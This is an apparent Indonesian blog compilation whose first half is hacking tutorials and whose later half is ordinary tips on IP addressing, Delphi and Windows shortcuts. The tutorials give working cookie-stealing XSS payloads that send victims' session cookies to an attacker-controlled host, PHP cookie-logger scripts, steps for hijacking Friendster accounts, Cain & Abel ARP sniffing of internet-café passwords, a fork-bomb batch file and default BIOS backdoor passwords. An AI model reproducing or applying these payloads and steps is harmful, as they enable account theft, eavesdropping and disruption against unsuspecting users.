cara hack friendster - inget yah stealing cookies

Pengen tau cara mencuri pass dan login fs milik orang lain… cara kerjanya adalah mengelabui…. orang yang buka fs kita dengan menampilkan gambar ato foto yang menantang… dengan foto tersebutlah kita bekerja…

syarat :

1. Punya FS (tentunya)
2. Punya sites, buat yg gratisan yg support script PHP untuk melihat/eksekusi
cookie yag sudah kita tanam
3. gunakan mozilla
langkah-langkah :

1. login FS
2. masuk ke profile–>edit profile–>customize
3. pate code berikut di bagian CSS (Upload an image with PhotoBucket) untuk
menjalankan javascript
(penempatan bisa dimana saja, atas/bawah)

naon_wae_lah(apa aja lah) {
height :
expr/**/ession(document.location=’http:///.php?kukis=’+document.cookie)
}

a. yoursite=site yg dah dibikn pake situs gratisan (lihat syarat no 2), contoh :
www.evil-site.com
b. yourfile=file untuk menanam cookies pada situs gratisan (lihat a), contoh:
cook.php

4. buat file cook.php(lihat b)

——————————————————————–

{?php
$kokis = $HTTP_GET_VARS[’kukis’];
$filename = “cok.log”;

‘// metoda dengan append append

$handle = fopen($filename, ‘a’);
fwrite($handle, $kokis);

fClose($handle);
‘// redirect-in ke punya tmn lo
echo “{script}document.location=’http://www.friendster.com’;{/script}”;

?}

——————————————————————–
Jangan lupa rubah tanda ‘{’ jadi ‘< ’ dan ‘}’ jadi ‘>’
tanpa tanda curek.

trus kl dah gt, ngpain ? kacape-kacape.
hmmmmm, ….., ya udah cma gt doang
cari target tmn lo. ( pasang foto yg agk cakepan dikit… hehehehee, buat
mancing doang)
biarkan tmn lo buka profile lo.

ya, memang profile lo gk da bs dbuka, tp liat di
http:////cok.log
Huh…..Panen gk ya…!!!, ya gmn muka see…. he..he..he
dah dulu ah, ….so boreddddddddddddddddd……….!!!
eh bentar dulu mo kmana..!!!.
trus kl dah panen gmn ?

nynt dunk..
cari aja nama cookies “friendster_auth=uid” di
http:////cok.log
nama cookies yg laen sprt: friendster_auth=deleted,friendster_pusit_auth=uid
abaikan saja

contoh hasil panen :
friendster_auth=uid=33674163&lastclick=1163646748&cty=id&icty=au&mac=
ODEwYjgyMjE1ZDAwYTlkM2Q0NTc5ZjM3MmMyMzY3ODk*

trus di apain ?
Buka pake notepad aja :
C:Documents And SettingsAdministratorApplication
DataMozillaFirefoxProfiles.defaultcookies.txt

replace karakter ascii “=” dengan %3D
replace karakter ascii “?” dengan %26
replace karakter ascii “*” dengan %2A

Trus ?
trus, trus mulu ky tukng parkir….heheheh
hapus semua var Cookie, trus isikan text dibawah ini

.www.friendster.com True / False XXXXXX friendster_
auth uid%3D33674163&lastclick%3D1163646748&cty%3Did&icty%3Dau&mac

%3DODEwYjgyMjE1ZDAwYTlkM2Q0NTc5ZjM3MmMyMzY3ODk2A

Close smua browser, buka mozilla,……
trus………., ya lihat disamping kanan “LOGOUT” N Foto victim cakep bukan
????////

penangananya supaya tidak terjebak itu matikan fasilitas cookies anda...

POC Xss Attack newbie

XSS attack Simulation

Banyaknya temen2 yang pernah nanya ama gw tentang apa itu XSS dan seberapa bahayakah Xss itu, maka gw berkeinginan membagikan sedikit yang gw punya. mungkin ne sekedar tutor cupu dari seorang new bee kaya gua ne.
Ok...ada baiknya kita mengetahui, apakah Xss itu.
XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client. Xss mungkin jenis serangan yang paling cupu bagi seorang attacker yang tidak mempunyai Bug atau exploit. dikarenakan Xss hanya membutuhkan sebuah browser saja.

Bagaimanakah menemukan Situs yang vulner?
Mmpph......mencari situs yang vulner emang gampang-gampang susah, karena kebanyakan situs udah memfilternya, tapi gimanapun kita masih bisa menyuruh kacung paling baik di seluruh dunia untuk mencarinya, sapa lagi kalo bukan paman Google.
Betul, kita menggunakan Dork dengan query sebagai berikut:

" inurl:"search.php?q=" "


atau jika manual kita bisa mencoba fasilitas sebuah site seperti Guest book, Search Box, Shoutboxes, Comment atau forum.

Nah sekarang jika sudah kita ketemukan target kita akan mencoba mengexploit site itu dulu, apakah site itu mempunyai vulner terhadap XSS.
Ok sekarang kita coba menginjeksi dengan kode :


" alert("XSS") "


maka jika menampilkan dialog box seperti ini maka site itu vulner :





tapi apakah sekedar itu saja, sekarang kita coba dengan metoda lain, apakah site itu bisa dideface bro? bisa saja, sekarang kita coba bagaimana mengattack site yang vulner itu ok.
dengan penyisipan tag IMG SCR pada sebuah url atau pada comment sekali.
Apa itu IMG SCR tu bro? IMG SCR itu adalah semacam Tag pemangilan gambar dari suatu link tertentu untuk ditampilkan kepada website tersebut.
pemanggilan tag itu dengan code sebagai berikut :

tapi terlebih dahulu gambar deface lo bisa upload dulu ke hostingan, misalnya ke photobucket atau flickr. setelah itu ganti url nya dengan url gambar tadi.
hingga menjadi seperti seperti berikut :

" "

nah setelah siap kemudian sisipkan pada URl situs yang mempunyai bug tadi hingga menjadi seperti contoh.
" http://www.Target.ac.id/search/?q="


kemudian apa yang terjadi???
maka situs yang mempunyai bug tadi akan berubah tampilan menjadi gambar yang kita upload tadi.
misalnya contoh gini:




metode penyisipan lain selain dengan gambar juga bisa kita lakukan misalnya dengan file flash (SWF) hingga serangan ini mempunyai style tersendiri

"

dengan penyisipan tag tersebut maka akan langsung meng exekusi file SWF pada link tersebut.
atau mungkin dengan melakukan redirect ke situs lain misalnya dengan code :


" window.open( "http://www.google.com/" ) "

maka jika dieksekusi , kita akan di redirect ke situs google, mungkin biasa aja, tapi gimana klo dibawa ke suatu situs login palsu misalnya fake login yahoo, mungkin bisa berbahaya juga tuh.

Nah oleh karena itu XSS ini walaupun bug kecil tapi bisa berbahaya juga, misalnya dengan melakukan teknik Xss Cookies Stealing.

Apa itu Cookies Stealing . cookie stealing itu adalah mendapatkan cookie orang lain, supaya kamu dikenali oleh Situs target sebagai orang tersebut.

Nah buat pertamanya ambil Cookie Logger Di http://G0t-Root.net/tools/cookie.php
Atau salin aja code dibawah ini :



$c = $_GET['c'];
$file = fopen(?Log.txt?,'a?);
fwrite($file,$c);
fclose($file);
?>



Ok sekarang gw anggap lo dah memilikinya save dengan extensien Php dan upload ke server lo, dan jangan lupa untuk membuat file LOG.TXT dengan chmod 777 dan sekarang kita langsung menuju ke website yang akan diserang.
masukan code ini

" window.location = "http://server-lu.com/cookielogger.php?c="+document.cookie "

atau

" document.location = "http://Server-lu.com/cookielogger.php?c="+document.cookie "


hingga otomatis url pada site berubah menjadi

" http://Target.com/search.php?q=document.location = "http://server-lu.com/cookielogger.php?c="+document.cookie "

Nah jika ada user berkunjung ke situs yang telah di inject tadi maka otomatis cookies tersebut akan terekam dan masuk kedalam log file yang telah dipersiapkan dan lo bisa mengawasi cookies yang didapatkan hingga ntar lo bisa meng hijack cookies tersebut.
Ne misalkan hasil cookies yang telah didapat :


" $ ls -la /home/theSiteUsername/tmp/ | grep sess
-rw------- 1 theSiteUsername theSiteUsername 5068 Sep 18 09:20 sess_1a1aexxxxxxx5e282e1a5747694ec8e2
-rw------- 1 theSiteUsername theSiteUsername 5023 Sep 18 09:19 sess_462fexxxxxxx13dafa331bc15e962e22
-rw------- 1 theSiteUsername theSiteUsername 5109 Sep 18 10:51 sess_717edxxxxxxx653df341f91d096e0484
-rw------- 1 theSiteUsername theSiteUsername 5079 Sep 18 09:14 sess_91850xxxxxxxef480524c23412b23dc1
-rw------- 1 theSiteUsername theSiteUsername 5011 Sep 18 10:38 sess_9246dxxxxxxxe6e710a9e623af23ca95
-rw------- 1 theSiteUsername theSiteUsername 5079 Sep 18 09:25 sess_a4cdcxxxxxxx065ede6ecb062d443f86 "


Nah sekian tutor pendeknya, semoga aja berguna n keep posting and share you knowledge.




Thanks to :

Eva-00, Massmissilie, T0mahawak, Kuc1ng Bl4ck, Coolkid, Cruzen, P1taqh, Neww bee, and semua member jasakom community.........



Visit Me : Http://Aurel666.co.cc

Mencuri Cookies di Friendster

Cookies jelaslah sangat krusial. Apalagi di situs Friendster. Buat yg gak tau cookie, lebih baik cari info di abang Google, atau tante Yahoo, atau juga di embah Crankle, om AstaVista, dll.

Begini saja singkatnya. Cookie adalah suatu penanda yang diberikan suatu web server ke komputer kita sebagai tanda bahwa kita pernah mengunjungi situs yang bersangkutan. Nah, di beberapa situs semacam Friendster, kita akan diberikan sebuah Cookie khusus jika kita Log In ke situsnya. Nah, selama kita belum Log Out atau cookie tersebut dihapus, maka komputer tersebut akan selalu menampilkan halaman member yang bersangkutan jika membuka situs Friendster. Lalu, bagaimana jika Cookie tersebut kita curi dari member yang sedang log in?

Inilah topik yang cukup menarik. Setelah beberapa hari yang lalu saya membahas tentang Hack Friendster, saya kembali mengulasnya. Kenapa disini saya membahas mencuri Cookie di Friendster, bukan Cookie Yahoo? Ada beberapa alasan :

1. Friendster adalah situs yang cukup populer (ugh.. retoris)

2. Cookies-nya Friendster kadaluarsanya bertahun-tahun

Nah, alasan keuda-lah yang sebenarnya sangat krusial. Kalau Yahoo!, Cookies-nya punya kadaluarsa 24 Jam. Kalau Friendster, kalau gak salah kadaluarsanya bisa sampai 2015 lebih.

Oke, mulai saja tutorialnya.

Syarat yang Di Perlukan:

1.Punya Browser Mozzilla Firefox Dengan Add-On Cookie Editor!!

Kalo Belom Punya Klik Di SINI

2.Webhosting Untuk Penyimpanan Cookies Dan Code!!

Example:

http://www.ripway.com/ atau http://www.ifastnet.com Dan LAin2!!

3.Punya Account FriendSter Tentunya!!

Langkah-Langkahnya adalah:

1.Buat File PHP dengan nama c.php, (bisa buat di notepad ajah, tapi save dengan SAVE AS TYPE-nya All Files dan simpan dengan nama c.php). Isinya :

$cookie = $_GET[’c'];

$id = $_GET[’ses’];

$ip = getenv (’REMOTE_ADDR’);

if(strstr($cookie, “mac”)){

$fl = fopen(’lastkukis.txt’, ‘r’);

$buftxt = fgets($fl);

fclose($fl);


if($cookie!=$buftxt)

{

$date=date(”dmy.g:ia”);

$fl = fopen(’logkukis.txt’, ‘a’);

fwrite($fl, “\n”.$ip.’;;’.$id.’;;’.$date.”\n”.$cookie.”\n”);

fclose($fl);

$fl = fopen(’lastkukis.txt’, ‘w’);

fwrite($fl, $cookie);

fclose($fl);


}

}

echo “history.back(-1)”;

?>

2.Buat File Dengan Nama super.js Yang Isinya:

if (pageViewerID!=””){

var c=fgetCookie(”friendster_auth”);

if (c!=””)setTimeout(”window.location.href=’http://URLWEBHOSTING/c.php?c=’+escape(c)+’&ses=’+escape(pageViewerFName)+’~’+pageViewerID+’~@’+pageOwnerID”, 8000);}

JANGAN LUPA GANTI YANG BERCETAK TEBAL DENGAN URL WEB ANDA YANG ADA FILE PHP-NYA YANG SUDAH DI-UPLOAD

3.Dan Langkah Terakhir adalah Letakkan

Code INI:

ATAU

Nah….Klo Udah Dapet!!


Kamu Buka Link Ini:

ENCODER

Nah Setelah Itu Buka Cookie Editor Di Mozilla Dengan Cara:

Tools >>> Cookie Editor>>> ADD!!

ISI Dari Kolom Kosong Tersebut:

Name : friendster_auth


Content : hasil Encoder

Host : www.friendster.com

Path : /

EXPIRES: NEW EXPIRATION DATE

TAMBAHKAN NILAI TAHUN SAJA Dari 2007 Menjadi 2009 Atau 2015

Setelah Itu SAVE Dan Refresh friendSter-Nya

Semoga bermanfaat, teknik ini juga bisa diimplementasikan pada Media Box…..

Hack Password Friendster Pengunjung Warnet Dengan Cain Abel

Cara ini menggunakan program cain abel. Sebenarnya bukan hanya password friendster saja yang dapat dibobol dengan program ini. Semua website yang memiliki fasilitas login dapat dibobol dengan program ini kecuali jika website tersebut menggunakan ssl yang ditandai dengan tanda gembok yang muncul pada browser saat kita akan melakukan login. Website yang menggunakan ssl diantaranya yahoomail, gmail, rapidshare dll. To the point aja dah ikuti cara berikut :








1. Download program cain abel DISINI
2. Install program, tinggal next next OK aja.
3. Nah skarang buka programnya.
4. Klik configure klik di tab sniffer adapter yang aktif, bisanya klo aktif ada IP adress misalnya 192.168.0.1. Trs klik OK.

5. Skrg klik tab sniffer, lalu klik pada bagian bawah program pada icon host yg ak tandai dengan warna merah , lalu klik tanda + yg ak tandai dengan warna biru di bagian atas, nanti akan muncul tampilan seperti di gambar.











6. Klik pada opsi "All Host In My Subnet" dan "All Test".
10. Klik pada tab APR, lalu klik tanda +, muncul tampilan baru , pada bagian kiri pilih IP target, bagian kanan klik ip yang paling atas trs OK. Saran saya sih ip targetnya diklik smua aja tapi klikna harus satu2 gak bisa langsung.
7. Skrg aktifkan sniffer dengan cara klik pada icon start/stop sniffer yg ak tandai warna hijau.
8. Skrg klik pada tab password yg ak tandai dengan warna kuning.
9. Cari yang http lalu klik, nah sekarang anda tinggal menunggu beberapa saat.

Sekedar mengingatkan trik ini pada sebagian kecil warnet dapat merusak billing dan juga dapat membuat koneksi internet mengalami gangguan. Saat saya coba di 2 warnet, pengunjungnya pada pulang gara gara koneksinya putus, dan pada salah satu warnet billing operatornya rusak. Trs temennya temen saya juga diaduin pihak warnet ke polisi gara gara ngrusakin billing warnetnya walhasil dia nginep di hotel bintang lima selama 2 hari hehehe..Selamat mencoba.


tapi ini cuman sebagai admin yang jail... klu gue sih gak lah....

Membuat Hang PC Hanya Dengan Notepad

# Notepad ternyata bukan hanya sekedar aplikasi untuk menulis saja, tetapi punya banyak sekali fungsi salah satunya dalam hal hacking. Hanya dengan mengetikkan beberapa perintak seperti di CMD pada notepad, bisa membuat komputer hang dengan waktu kurang dari 1 menit. Ga percaya? Aya dicoba !!Gini nih caranya :
Buka Notepad dan ketik start berulang kali dengan enter
start
start
start
start
start

Kalo udah save dengan extensi .bat, contoh : hack.bat
Coba buka file yang sudah di save tadi, maka akan keluar banyak jendela CMD.
Buka kembali notepad dan open file yang tadi dibuat, di akhir baris ketikkan nama file yang tadi di save, contoh hack.bat

start
start
start
start
start
start
start
start
start

hack.bat

Hal ini akan membuat file ini membuka start 8 kali dan sekaligus membuka file hack.bat, maka akan muncul jendela CMD yang banyaaaaaaaaak sekaliiiii yang bisa membuat komputer menjadi crash dan hang. Satu-satunya cara menyembuhkannya adalah dengan merestart komputer.

mainan anak kecil

GSM and CDMA tools and book

http://pathloss40.blogspot.com

Membuat Splash Screen

Splash screen merupakan tampilan yang kita lihat pertama kali waktu kita menjalankan sebuah aplikasi. Splash screen ini biasanya ditampilkan untuk mengurangi kejenuhan user sewaktu program masih dalam tahap inisialisasi.

Untuk membuat splash scren tersebut caranya sebagai berikut :

1. Bikin dulu form utamanya.
2. Tambahkan form yang akan digunakan sebagai splash screen (dari menu File, pilih New Form). Beri nama form tersebut dengan FrmSplash.
3. Tambahkan komponen Timer (terletak pada tab Win32), beri nama dengan tmMainTimer.
4. Tambahkan kode berikut pada events onTimer dari komponen Timer tersebut :tmMainTimer.Enabled := False;
5. Dari menu Project, pilih Options.
6. Pindah ke tab Forms.
7. Dari bagian auto create forms akan terlihat dua buah form. Pilih Form yang akan digunakan sebagai splash screen dan klik tombol “>” untuk memindah form splash screen ke bagian Available forms.
8. Kalau sudah klik OK.
9. Sekarang dari menu View, pilih Project Source. Pada program utama buatlah form splash screen sebelum inisialisasi dilakukan.

Cara Mengenalkan Web Site

Setelah Anda selesai mendesain dan meng-upload file bukan berarti tugas kita sudah selesai. Apa artinya kita punya website tapi nggak ada orang yang tahu ? Nah, supaya website kita dikenal orang ada beberapa cara yang bisa kita lakukan, yaitu :

1. Daftarkan ke search engine
Search engine banyak digunakan orang untuk mendapatkan alamat suatu situs berdasarkan keyword yang mereka masukkan. Di internet sekarang ini terdapat ratusan bahkan ribuan seach engine mulai dari yang ecek-ecek sampai yang besar, yang dikelola secara profesional. Anda tidak harus mendaftar web Anda ke semua search engine tersebut, tapi daftarkan saja ke beberapa searach engine yang terkenal yang ada di Indonesia maupun di luar negeri. Untuk pendaftarannya terdapat perbedaan antara satu search engine dengan search engine lainnya. Yang pertama, pada saat Anda mendaftar pada suatu search engine Anda harus memasukkan keyword dan deskripsi singkat tentang web site Anda. Contohnya Search Indonesia, Catcha, dll. Yang kedua, pada saat mendaftar Anda cukup menunjukkan URL website Anda. Setelah itu search engine tersebut akan “menjelajah” ke web Anda dan mencari keyword dan deskripsi yang terletak pada meta tag halaman web Anda. Untuk itu sebelum upload, pastikan bahwa Anda telah menuliskan meta tag tersebut dengan benar. (Jika Anda belum tahu tentang meta tag, lihat pada source code HTML pada halaman utama web site ini, filenya bernama index.shtml)

2. Ikut Banner Exchange
Ini cara lain untuk mengenalkan web kita. Dengan mengikuti pertukaran banner maka Anda diwajibkan untuk menampilkan banner orang lain (yang menjadi anggota) pada situs Anda. Dan sebaliknya banner Anda pun akan ditampilkan pada situs lain. Ukuran banner yang digunakan biasanya 468 x 60 pixel. Untuk membuat banner Anda dapat menggunakan Adobe PhotoShop, dan untuk membuat animasinya Anda dapat menggunakan Ulead Gif Animator.

Pesan Di Awal Start Up

Echo off
Cls
Echo Komputer ini milik Rossi
Echo.
Echo Jadi jangan diobok-obok ya...
Echo.
For %%C in(A B C D E F G H I J K L) do Dir C:\Windows >Null
Echo.
Echo Kalau macem-macem, AWAS..!!!

Maka tiap kali komputer anda di-boot, akan muncul pesan tersebut. Tulisan yang diawali dengan Echo bisa anda ganti dengan pesan anda sendiri. So kamu bisa ngusilin teman yang masih awam dalam komputer dengan tulisan-tulisan aneh, seperti “Komputer ini terserang virus DIE HARD..” Pasti temen anda bingung.

Shortcut untuk Shutdown, Restart dan Logoff

Untuk mempercepat shutdown Anda bisa membuat shortcut pada desktop. Caranya :

1. Klik kanan area kosong pada desktop lalu pilih New - Shortcut.
2. Pada command line ketikkan c:\windows\rundll32.exe user, exitwindows.
3. Klik next dan beri nama shortcut tersebut.
4. Terakhir klik Finish.

Untuk shortcut restart Anda harus mengganti c:\windows\rundll32.exe user, exitwindows dengan C:\WINDOWS\RUNDLL.EXE user.exe,exitwindowsexe.

Untuk shortcut restart Anda harus mengganti c:\windows\rundll32.exe user, exitwindows dengan C:\WINDOWS\RUNDLL.EXE shell32.dll,SHExitWindowsEx 0.

Konsep IP Address di Internet

Walaupun bagi para pengguna Internet umumnya kita hanya perlu mengenal hostname dari mesin yang dituju, seperti: server.indo.net.id, rad.net.id, ui.ac.id, itb.ac.id. Bagi komputer untuk bekerja langsung menggunakan informasi tersebut akan relatif lebih sulit karena tidak ada keteraturan yang dapat di programkan dengan mudah. Untuk mengatasi hal tersebut, komputer mengidentifikasi alamat setiap komputer menggunakan sekumpulan angka sebanyak 32 bit yang dikenal sebagai IP address.

Adanya IP Address merupakan konsekuensi dari penerapan Internet Protocol untuk mengintegrasikan jaringan komputer Internet di dunia. Seluruh host (komputer) yang terhubung ke Internet dan ingin berkomunikasi memakai TCP/IP harus memiliki IP Address sebagai alat pengenal host pada network. Secara logika, Internet merupakan suatu network besar yang terdiri dari berbagai sub network yang terintegrasi. Oleh karena itu, suatu IP Address harus bersifat unik untuk seluruh dunia. Tidak boleh ada satu IP Address yang sama dipakai oleh dua host yang berbeda. Untuk itu, penggunaan IP Address di seluruh dunia dikoordinasi oleh lembaga sentral Internet yang di kenal dengan IANA - salah satunya adalah Network Information Center (NIC) yang menjadi koordinator utama di dunia untuk urusan alokasi IP Address ini adalah:

InterNIC Registration Services Network Solution Incorporated 505 Huntmar Park Drive, Herndon, Virginia 22070 Tel: [800] 444-4345, [703] 742-4777 FAX: [703] 742-4811 E-mail: hostmaster@internic.net

Sedangkan untuk tingkat Asia Pasifik saat ini masih dikoordinasi oleh:

Asia Pacific Network Information Center c/o Internet Initiative Japan, Inc. Sanbancho Annex Bldg., 1-4, Sanban-cho, Chiyoda-ku, Tokyo, 102 Japan Tel: +81-3-5276-3973 FAX: +81-3-5276-6239 E-mail: domreg@apnic.net http://www.apnic.net

Struktur IP Address

IP Address terdiri dari bilangan biner sepanjang 32 bit yang dibagi atas 4 segmen. Tiap segmen terdiri atas 8 bit yang berarti memiliki nilai desimal dari 0 - 255. Range address yang bisa digunakan adalah dari 00000000.00000000.00000000.00000000 sampai dengan 11111111.11111111.11111111.11111111. Jadi, ada sebanyak 232 kombinasi address yang bisa dipakai diseluruh dunia (walaupun pada kenyataannya ada sejumlah IP Address yang digunakan untuk keperluan khusus). Jadi, jaringan TCP/IP dengan 32 bit address ini mampu menampung sebanyak 232 atau lebih dari 4 milyar host. Untuk memudahkan pembacaan dan penulisan, IP Address biasanya direpresentasikan dalam bilangan desimal. Jadi, range address di atas dapat diubah menjadi address 0.0.0.0 sampai address 255.255.255.255. Nilai desimal dari IP Address inilah yang dikenal dalam pemakaian sehari-hari. Beberapa contoh IP Address adalah :

44.132.1.20
167.205.9.35
202.152.1.250

Ilustrasi IP Addres dalam desimal dan biner dapat dilihat pada gambar 1 berikut:

IP Address dapat dipisahkan menjadi 2 bagian, yakni bagian network (bit-bit network/network bit) dan bagian host (bit-bit host/host bit). Bit network berperan dalam identifikasi suatu network dari network yang lain, sedangkan bit host berperan dalam identifikasi host dalam suatu network. Jadi, seluruh host yang tersambung dalam jaringan yang sama memiliki bit network yang sama. Sebagian dari bit-bit bagian awal dari IP Address merupakan network bit/network number, sedangkan sisanya untuk host. Garis pemisah antara bagian network dan host tidak tetap, bergantung kepada kelas network. Ada 3 kelas address yang utama dalam TCP/IP, yakni kelas A, kelas B dan kelas C. Perangkat lunak Internet Protocol menentukan pembagian jenis kelas ini dengan menguji beberapa bit pertama dari IP Address. Penentuan kelas ini dilakukan dengan cara berikut:

Jika bit pertama dari IP Address adalah 0, address merupakan network kelas A. Bit ini dan 7 bit berikutnya (8 bit pertama) merupakan bit network sedangkan 24 bit terakhir merupakan bit host. Dengan demikian hanya ada 128 network kelas A, yakni dari nomor 0.xxx.xxx.xxx sampai 127.xxx.xxx.xxx, tetapi setiap network dapat menampung lebih dari 16 juta (2563) host (xxx adalah variabel, nilainya dari 0 s/d 255). Ilustrasinya dapat dilihat pada gambar 2 berikut.

Jika 2 bit pertama dari IP Address adalah 10, address merupakan network kelas B. Dua bit ini dan 14 bit berikutnya (16 bit pertama) merupakan bit network sedangkan 16 bit terakhir merupakan bit host. Dengan demikian terdapat lebih dari 16 ribu network kelas B (64 x 256), yakni dari network 128.0.xxx.xxx - 191.255.xxx.xxx. Setiap network kelas B mampu menampung lebih dari 65 ribu host (2562). Ilustrasinya dapat dilihat pada gambar 3 berikut.

Jika 3 bit pertama dari IP Address adalah 110, address merupakan network kelas C. Tiga bit ini dan 21 bit berikutnya (24 bit pertama) merupakan bit network sedangkan 8 bit terakhir merupakan bit host. Dengan demikian terdapat lebih dari 2 juta network kelas C (32 x 256 x 256), yakni dari nomor 192.0.0.xxx sampai 223.255.255.xxx. Setiap network kelas C hanya mampu menampung sekitar 256 host. Ilustrasinya dapat dilihat pada gambar 4.

Selain ke tiga kelas di atas, ada 2 kelas lagi yang ditujukan untuk pemakaian khusus, yakni kelas D dan kelas E. Jika 4 bit pertama adalah 1110, IP Address merupakan kelas D yang digunakan untuk multicast address, yakni sejumlah komputer yang memakai bersama suatu aplikasi (bedakan dengan pengertian network address yang mengacu kepada sejumlah komputer yang memakai bersama suatu network). Salah satu penggunaan multicast address yang sedang berkembang saat ini di Internet adalah untuk aplikasi real-time video conference yang melibatkan lebih dari dua host (multipoint), menggunakan Multicast Backbone (MBone). Kelas terakhir adalah kelas E (4 bit pertama adalah 1111 atau sisa dari seluruh kelas). Pemakaiannya dicadangkan untuk kegiatan eksperimental.

Jenis kelas address yang diberikan oleh kooordinator IP Address bergantung kepada kebutuhan instansi yang meminta, yakni jumlah host yang akan diintegrasikan dalam network dan rencana pengembangan untuk beberapa tahun mendatang. Untuk perusahaan, kantor pemerintah atau universitas besar yang memiliki puluhan ribu komputer dan sangat berpotensi untuk tumbuh menjadi jutaan komputer, koordinator IP Address akan mempertimbangkan untuk memberikan kelas A. Contoh IP Address kelas A yang dipakai di Internet adalah untuk amatir paket radio seluruh dunia, mendapat IP nomor 44.xxx.xxx.xxx. Untuk kelas B, contohnya adalah nomor 167.205.xxx.xxx yang dialokasikan untuk ITB dan jaringan yang terkait ke ITB dibawah koordinator Onno W. Purbo.

Address Khusus

Selain address yang dipergunakan untuk pengenal host, ada beberapa jenis address yang digunakan untuk keperluan khusus dan tidak boleh digunakan untuk pengenal host. Address tersebut adalah :

* Network Address.
Address ini digunakan untuk mengenali suatu network pada jaringan Internet. Misalkan untuk host dengan IP Address kelas B 167.205.9.35. Tanpa memakai subnet, network address dari host ini adalah 167.205.0.0. Address ini didapat dengan membuat seluruh bit host pada 2 segmen terakhir menjadi 0. Tujuannya adalah untuk menyederhanakan informasi routing pada Internet. Router cukup melihat network address (167.205) untuk menentukan kemana paket tersebut harus dikirimkan. Contoh untuk kelas C, network address untuk IP address 202.152.1.250 adalah 202.152.1.0. Analogi yang baik untuk menjelaskan fungsi network address ini adalah dalam pengolahan surat pada kantor pos. Petugas penyortir surat pada kantor pos cukup melihat kota tujuan pada alamat surat (tidak perlu membaca seluruh alamat) untuk menentukan jalur mana yang harus ditempuh surat tersebut. Pekerjaan “routing” surat-surat menjadi lebih cepat. Demikian juga halnya dengan router di Internet pada saat melakukan routing atas paket-paket data.
* Broadcast Address.
Address ini digunakan untuk mengirim/menerima informasi yang harus diketahui oleh seluruh host yang ada pada suatu network. Seperti diketahui, setiap paket IP memiliki header alamat tujuan berupa IP Address dari host yang akan dituju oleh paket tersebut. Dengan adanya alamat ini, maka hanya host tujuan saja yang memproses paket tersebut, sedangkan host lain akan mengabaikannya. Bagaimana jika suatu host ingin mengirim paket kepada seluruh host yang ada pada networknya ? Tidak efisien jika ia harus membuat replikasi paket sebanyak jumlah host tujuan. Pemakaian bandwidth akan meningkat dan beban kerja host pengirim bertambah, padahal isi paket-paket tersebut sama. Oleh karena itu, dibuat konsep broadcast address. Host cukup mengirim ke alamat broadcast, maka seluruh host yang ada pada network akan menerima paket tersebut. Konsekuensinya, seluruh host pada network yang sama harus memiliki address broadcast yang sama dan address tersebut tidak boleh digunakan sebagai IP Address untuk host tertentu. Jadi, sebenarnya setiap host memiliki 2 address untuk menerima paket : pertama adalah IP Addressnya yang bersifat unik dan kedua adalah broadcast address pada network tempat host tersebut berada. Address broadcast diperoleh dengan membuat seluruh bit host pada IP Address menjadi 1. Jadi, untuk host dengan IP address 167.205.9.35 atau 167.205.240.2, broadcast addressnya adalah 167.205.255.255 (2 segmen terakhir dari IP Address tersebut dibuat berharga 11111111.11111111, sehingga secara desimal terbaca 255.255). Jenis informasi yang dibroadcast biasanya adalah informasi routing.
* Netmask.
Adalah address yang digunakan untuk melakukan masking / filter pada proses pembentukan routing supaya kita cukup memperhatikan beberapa bit saja dari total 32 bit IP Address. Artinya dengan menggunakan netmask tidak perlu kita memperhatikan seluruh (32 bit) IP address untuk menentukan routing, akan tetapi cukup beberapa buah saja dari IP address yg kita perlu perhatikan untuk menentukan kemana packet tersebut dikirim.

Kaitan antara host address, network address, broadcast address & network mask sangat erat sekali - semua dapat dihitung dengan mudah jika kita cukup paham mengenai bilangan Biner. Jika kita ingin secara serius mengoperasikan sebuah jaringan komputer menggunakan teknologi TCP/IP & Internet, adalah mutlak bagi kita untuk menguasai konsep IP address tersebut. Konsep IP address sangat penting artinya bagi routing jaringan Internet. Kemampuan untuk membagi jaringan dalam subnet IP address penting artinya untuk memperoleh routing yang sangat effisien & tidak membebani router-router yang ada di Internet. Mudah-mudahan tulisan awal ini dapat membuka sedikit tentang teknologi / konsep yang ada di dalam Internet.

Penulis: Aulia K. Arif & Onno W. Purbo

Menjebol Password BIOS

Password BIOS memang sangat berguna untuk melindungi komputer Anda supaya tidak ada orang lain yang dapat mengganti konfigurasi komputer Anda. Tapi password tersebut bisa menjadi malapetaka jika Anda lupa. Nah, jika Anda lupa password BIOS Anda, di bawah ini kami tampilkan default password yang aslinya memang disediakan oleh pembuatnya untuk mengantisipasi kejadian password yang terlupakan. Yang perlu Anda lakukan adalah mencoba satu per satu password tersebut sampai Anda menemukannya

AWARD BIOS
01322222, 589589, 589721, 595595, 598598, AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet, %øåñòü ïpîáåëîâ%, %äåâÿòü ïpîáåëîâ%

AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder

PHOENIX
BIOS, CMOS, phoenix, PHOENIX

Password lainnya yang bisa Anda cob
LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj

Akses Peralatan Luar Lewat Parallel Printer Port

Ingin mengendalikan peralatan luar dengan menggunakan komputer? Tentu sangat menyenangkan, apalagi hanya dengan beberapa baris program Delphi, kita dapat menyalakan lampu, menghidupkan motor, mengatur lengan robot ataupun mengakses peralatan elektronis lainnya.

Mungkin tulisan ini bisa menjadi cemilan yang cukup bergizi bagi Delphiers yang suka ngoprek elektronika praktis, ini lantaran kita tidak harus membuat card I/0 sendiri, tetapi cukup dengan memanfaatkan parallel printer port saja.

Parallel Printer Port
Port yang satu ini, dipastikan selalu ada pada setiap komputer. Tercermin dari namanya, saat ini parallel port lebih banyak dimanfaatkan untuk urusan pencetakan data. Sebenarnya, port inipun bisa dimanfaatkan untuk hal lain, karena memiliki input/output (I/O) data.

Tata-letak dari ke-dua puluh lima pin (DB 25) parallel printer port, diperlihatkan dalam Gambar 1.

Adapun tabel signal dan fungsi dari setiap pin pada parallel printer port, terlihat pada Gambar 2. Dari situ diketahui pin 2 s/d 9 (signal D0-D7) berfungsi sebagai output, yang selanjutnya dapat kita manfaatkan untuk mengontrol peralatan luar.

Rangkaiannya

